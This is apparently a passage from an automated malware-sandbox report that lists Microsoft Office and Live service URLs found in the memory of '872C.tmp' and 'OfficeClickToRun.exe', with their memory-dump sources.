00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v11T
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059803830.00000248C2D5C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 
https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d3
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dvideo
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2AF0000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2012043324.00000248C2AB8000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1es2
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/sharedfilepickerker
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videohostpage/videodeoq
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videopickerker
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://identity.osi.office.net/v1/tokenken
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comext28
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comffice
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comfile/3
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comom553
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.come1-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comn-1
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingntFlag
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bingt
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://invites.office.com/Bearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechioseOH
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices3
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoicestion~
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/err.srfr.srfceo$
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srft.srf
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_token.srfn.srf
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/recent-AD4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/v2.0/sharedwithmefigSource
